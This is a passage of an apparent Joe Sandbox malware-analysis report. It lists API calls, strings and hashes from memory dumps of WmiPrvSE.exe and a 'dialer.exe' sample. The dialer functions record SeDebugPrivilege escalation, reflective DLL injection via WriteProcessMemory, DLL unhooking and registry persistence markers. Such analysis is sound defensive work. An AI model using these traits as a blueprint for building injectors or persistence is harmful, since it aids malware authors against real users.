GetLastError.KERNEL32 ref: 000001F43C55249B

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ea223cb16a8c30a4614ff2808b6cc602d8108756aca582718aba659200e53d04
Instruction ID: 24bc1657cf319e977f8195d12f6c74b5abbf0a624455ce2df80dff0429446ca9
Opcode Fuzzy Hash: ea223cb16a8c30a4614ff2808b6cc602d8108756aca582718aba659200e53d04
Instruction Fuzzy Hash: 9FD1D172714AA18AF711CFAAD8403EE3BF1F354798F144226CF5A97B99DA34D406CB44

Function 000001F43C5414A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F43C5414C5
HeapFree.KERNEL32 ref: 000001F43C5414D4
GetProcessHeap.KERNEL32 ref: 000001F43C5414E1
HeapFree.KERNEL32 ref: 000001F43C5414F0
GetProcessHeap.KERNEL32 ref: 000001F43C541500

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction ID: bc2cfd87b0c844dcd2f3596daaf43696834c1274a5b44fafe57058d11e225b5a
Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction Fuzzy Hash: ED012532601FB1C7E704DB67E9041AA67A0F788B81F044435EB4A43B29DE38C0518B44

Function 000001F43C552980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001F43C552A9C
GetLastError.KERNEL32 ref: 000001F43C552B27

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 132266061ff4b9b8da68bf4eb15db926e852afbe6260eee4876dca9e3c8d8076
Instruction ID: bef4d86feab72111035d47719a367ea48ffd74096f6c859843135c2bf66aa517
Opcode Fuzzy Hash: 132266061ff4b9b8da68bf4eb15db926e852afbe6260eee4876dca9e3c8d8076
Instruction Fuzzy Hash: 6391AD72B00E7296F7649F6698903FE3BE0B754B98F144129DF0B67A95DB34D482CB08

Function 000001F43C547960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F43C54798C
GetCurrentThreadId.KERNEL32 ref: 000001F43C54799A
GetCurrentProcessId.KERNEL32 ref: 000001F43C5479A6
QueryPerformanceCounter.KERNEL32 ref: 000001F43C5479B6

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 9e0196f70d2e716d1a9c4fb7d0e8c1fb6d60d46d23140fa11c032a63aab64ace
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 8A111C32711F628AFF408B61E8553BA33A4F719768F441E31DBAD467A4DF78C1A88380

Function 000001F43C54253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F43C542620
StrCpyW.SHLWAPI ref: 000001F43C542639

Strings

\\.\pipe\, xrefs: 000001F43C54262B

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: f9ae2ac97f4d715802434cfbd0ca4b9e1963434c5062de052308e56cf21b1c36
Instruction ID: 898f1a94d1257ad74eac27c6abb52a58d04d3f02c6578cedd88258d648cd6503
Opcode Fuzzy Hash: f9ae2ac97f4d715802434cfbd0ca4b9e1963434c5062de052308e56cf21b1c36
Instruction Fuzzy Hash: E5718B36210EB287F6249B27AC443FB66D4F399B84F640136DF0A53B99DA35D6458708

Function 000001F43C519E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001F43C519EB7

Strings

RCC, xrefs: 000001F43C519E85
MOC, xrefs: 000001F43C519E7C

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: a2e91eab365d4defa6a58ce1a494d542bc026da6257776793ac04fc28f9cb92e
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 0F616636600BA58AFB209F66D0847EE77E0F344B8CF044625EF5A17B98DB38D195C704

Function 000001F43C542330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F43C542416
StrCpyW.SHLWAPI ref: 000001F43C54242D

Strings

\\.\pipe\, xrefs: 000001F43C542421

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 94153bbf33019caaa40224d47f7b4f8b7f9df6d428528a95645a5a22a8f385cf
Instruction ID: 9dbfffa4333f54a4ddff8da42e61523c45df93abe640b34d8874bb995f892e79
Opcode Fuzzy Hash: 94153bbf33019caaa40224d47f7b4f8b7f9df6d428528a95645a5a22a8f385cf
Instruction Fuzzy Hash: 2C51D132604BB383F6649F2BA8583FB66D1F395780FA54135DF4903B9ADA39D5048748

Function 000001F43C5526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F43C552807
GetLastError.KERNEL32 ref: 000001F43C552829

Strings

U, xrefs: 000001F43C5527B3

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: ab90102971ceac8fa3f56f4246b04eaec36c3a24b591b7a8d71cbeb1660410a4
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 0141A072325BA186EB20CF66E8443EA67A0F798794F504031EF4E87794EB3CD441CB44

Function 000001F43C5494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F43C5494F0
RaiseException.KERNEL32 ref: 000001F43C549531

Strings

csm, xrefs: 000001F43C54951E

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: cb4bd3035315878e9280cd40621ea5b27acae0a16cadb2226724a93f81651644
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: 08112B32219FA182EB618B16E4403AA77E5FB88B94F684220EF8D47B59DF3CC551CB04

Function 000001F43C517356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F43C51737C

Strings

ierarchy Descriptor', xrefs: 000001F43C517381
riptor at (, xrefs: 000001F43C517364

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 112806ad95ac896329d262121708039c41668deed9793ab86bc8cb95b4050cd3
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: B1E08671640F5591EF019F22E8402E933E0EB58B64F8891329A5C46311FA38D1E9C300

Function 000001F43C5173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F43C5173D8

Strings

riptor at (, xrefs: 000001F43C5173C0
Locator', xrefs: 000001F43C5173DD

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 7d2c095a9c56a5355ae211026a3b2c0daa07a94b6f15b3db03e56239e804f347
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 5EE08671600F5581EF019F22D4401E973E0F758B64BC89132CA5C46311EA38D1E5C300

Function 000001F43C541BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F43C541C2D
HeapAlloc.KERNEL32 ref: 000001F43C541C3B
GetProcessHeap.KERNEL32 ref: 000001F43C541C77
HeapFree.KERNEL32 ref: 000001F43C541C85

Part of subcall function 000001F43C54152C: StrCmpIW.SHLWAPI ref: 000001F43C54155D

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: fb449ff803a768897cf851f5cb12486fe80c59e499925aaffc7e705f13000d72
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 59114935612FB682FA449B67A8042BB63E1FB89FC0F184024DF4A57766DE39C4428704

Function 000001F43C541268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F43C54126E
HeapAlloc.KERNEL32 ref: 000001F43C54127D
GetProcessHeap.KERNEL32 ref: 000001F43C541297
HeapAlloc.KERNEL32 ref: 000001F43C5412A8

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: a867238719bf320315f8cd5d1f82c9140e1c20cb471035599175f90c7ac29ed0
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 46E06D35602E6587FB448F63D8083AB36E1FB89F06F04C024CA0A07751DF7D8499CB50

Analysis Process: dialer.exePID: 7504, Parent PID: 7244COMMON

Execution Graph

Execution Coverage:	44.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.8%
Total number of Nodes:	223
Total number of Limit Nodes:	20

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001F2C: StrCpyW.SHLWAPI ref: 0000000140001F5D
Part of subcall function 0000000140001F2C: StrCatW.SHLWAPI ref: 0000000140001F6B
Part of subcall function 0000000140001F2C: GetModuleHandleW.KERNEL32 ref: 0000000140001F74
Part of subcall function 0000000140001F2C: GetCurrentProcess.KERNEL32 ref: 0000000140001F94
Part of subcall function 0000000140001F2C: K32GetModuleInformation.KERNEL32 ref: 0000000140001FA8
Part of subcall function 0000000140001F2C: CreateFileW.KERNELBASE ref: 0000000140001FD8
Part of subcall function 0000000140001F2C: CreateFileMappingW.KERNELBASE ref: 0000000140002002
Part of subcall function 0000000140001F2C: MapViewOfFile.KERNELBASE ref: 0000000140002025
Part of subcall function 0000000140001F2C: lstrcmpiA.KERNEL32 ref: 000000014000207B
Part of subcall function 0000000140001F2C: CloseHandle.KERNELBASE ref: 00000001400020E7
Part of subcall function 0000000140001F2C: CloseHandle.KERNEL32 ref: 00000001400020F0
Part of subcall function 0000000140001F2C: FreeLibrary.KERNEL32 ref: 00000001400020F9

Part of subcall function 0000000140001F2C: VirtualProtect.KERNELBASE ref: 00000001400020AE
Part of subcall function 0000000140001F2C: VirtualProtect.KERNELBASE ref: 00000001400020DE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
GetLastError.KERNEL32 ref: 0000000140002312
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
LocalFree.KERNEL32 ref: 0000000140002408
RegCreateKeyExW.KERNELBASE ref: 000000014000243E
GetCurrentProcessId.KERNEL32 ref: 0000000140002448
RegSetValueExW.KERNELBASE ref: 000000014000246F
RegCloseKey.KERNELBASE ref: 0000000140002479
RegCloseKey.ADVAPI32 ref: 0000000140002483
CreateThread.KERNELBASE ref: 00000001400024A4
GetProcessHeap.KERNEL32 ref: 00000001400024AA
HeapAlloc.KERNEL32 ref: 00000001400024B9
CreateThread.KERNELBASE ref: 00000001400024E8
CreateThread.KERNELBASE ref: 0000000140002509
SleepEx.KERNELBASE ref: 0000000140002511

Strings

pid, xrefs: 000000014000241B
DLL, xrefs: 0000000140002321
ntdll.dll, xrefs: 0000000140002277
SOFTWARE\dialerconfig, xrefs: 0000000140002399
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00000001400023DE
kernel32.dll, xrefs: 0000000140002283
svc64, xrefs: 0000000140002452
SeDebugPrivilege, xrefs: 00000001400022C9

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 4177739653-1130149537
Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400018AC: OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
Part of subcall function 00000001400018AC: IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
Part of subcall function 00000001400018AC: CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

OpenProcess.KERNEL32 ref: 000000014000112C
OpenProcess.KERNEL32 ref: 000000014000114B
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001170
PathFindFileNameW.SHLWAPI ref: 000000014000117E
lstrlenW.KERNEL32 ref: 000000014000118A
StrCpyW.SHLWAPI ref: 00000001400011A1
CloseHandle.KERNEL32 ref: 00000001400011AD
StrCmpIW.SHLWAPI ref: 00000001400011E2
NtQueryInformationProcess.NTDLL ref: 0000000140001216
OpenProcessToken.ADVAPI32 ref: 0000000140001240
GetTokenInformation.KERNELBASE ref: 000000014000126C
GetLastError.KERNEL32 ref: 0000000140001276
LocalAlloc.KERNEL32 ref: 0000000140001289
GetTokenInformation.KERNELBASE ref: 00000001400012B5
GetSidSubAuthorityCount.ADVAPI32 ref: 00000001400012C2
GetSidSubAuthority.ADVAPI32 ref: 00000001400012D1
LocalFree.KERNEL32 ref: 00000001400012E9
CloseHandle.KERNEL32 ref: 00000001400012FD
StrStrA.SHLWAPI ref: 00000001400013A7
VirtualAllocEx.KERNELBASE ref: 000000014000140E
WriteProcessMemory.KERNELBASE ref: 0000000140001431
WaitForSingleObject.KERNEL32 ref: 000000014000147D
GetExitCodeThread.KERNEL32 ref: 0000000140001493
CloseHandle.KERNEL32 ref: 00000001400014AB
CloseHandle.KERNEL32 ref: 00000001400014B4

Strings

MSBuild.exe, xrefs: 00000001400011B8
dialer.exe, xrefs: 00000001400011CC
@, xrefs: 0000000140001401
ReflectiveDllMain, xrefs: 000000014000139D

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
API String ID: 2561231171-3753927220
Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000000014000150B
HeapAlloc.KERNEL32 ref: 000000014000151E
GetProcessHeap.KERNEL32 ref: 000000014000152C
HeapAlloc.KERNEL32 ref: 000000014000153D
K32EnumProcesses.KERNEL32 ref: 0000000140001557
OpenProcess.KERNEL32 ref: 0000000140001585
K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
ReadProcessMemory.KERNELBASE ref: 00000001400015E1
CloseHandle.KERNELBASE ref: 000000014000161D
GetProcessHeap.KERNEL32 ref: 000000014000162F
RtlFreeHeap.NTDLL ref: 000000014000163D
GetProcessHeap.KERNEL32 ref: 0000000140001643
RtlFreeHeap.NTDLL ref: 0000000140001651

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
LocalAlloc.KERNEL32 ref: 0000000140001BFB
InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140001F5D
StrCatW.SHLWAPI ref: 0000000140001F6B
GetModuleHandleW.KERNEL32 ref: 0000000140001F74
GetCurrentProcess.KERNEL32 ref: 0000000140001F94
K32GetModuleInformation.KERNEL32 ref: 0000000140001FA8
CreateFileW.KERNELBASE ref: 0000000140001FD8
CreateFileMappingW.KERNELBASE ref: 0000000140002002
MapViewOfFile.KERNELBASE ref: 0000000140002025
lstrcmpiA.KERNEL32 ref: 000000014000207B
VirtualProtect.KERNELBASE ref: 00000001400020AE
VirtualProtect.KERNELBASE ref: 00000001400020DE
CloseHandle.KERNELBASE ref: 00000001400020E7
CloseHandle.KERNEL32 ref: 00000001400020F0
FreeLibrary.KERNEL32 ref: 00000001400020F9

Strings

C:\Windows\System32\, xrefs: 0000000140001F4F
.text, xrefs: 0000000140002074

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001B54: AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
Part of subcall function 0000000140001B54: SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
Part of subcall function 0000000140001B54: LocalAlloc.KERNEL32 ref: 0000000140001BFB
Part of subcall function 0000000140001B54: InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
Part of subcall function 0000000140001B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
Part of subcall function 0000000140001B54: CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Sleep.KERNEL32 ref: 0000000140002C1D
ConnectNamedPipe.KERNELBASE ref: 0000000140002C2A
ReadFile.KERNEL32 ref: 0000000140002C4D
WriteFile.KERNEL32 ref: 0000000140002C7B
Sleep.KERNEL32 ref: 0000000140002C88
DisconnectNamedPipe.KERNEL32 ref: 0000000140002C91

Strings

\\.\pipe\dialerchildproc64, xrefs: 0000000140002C05
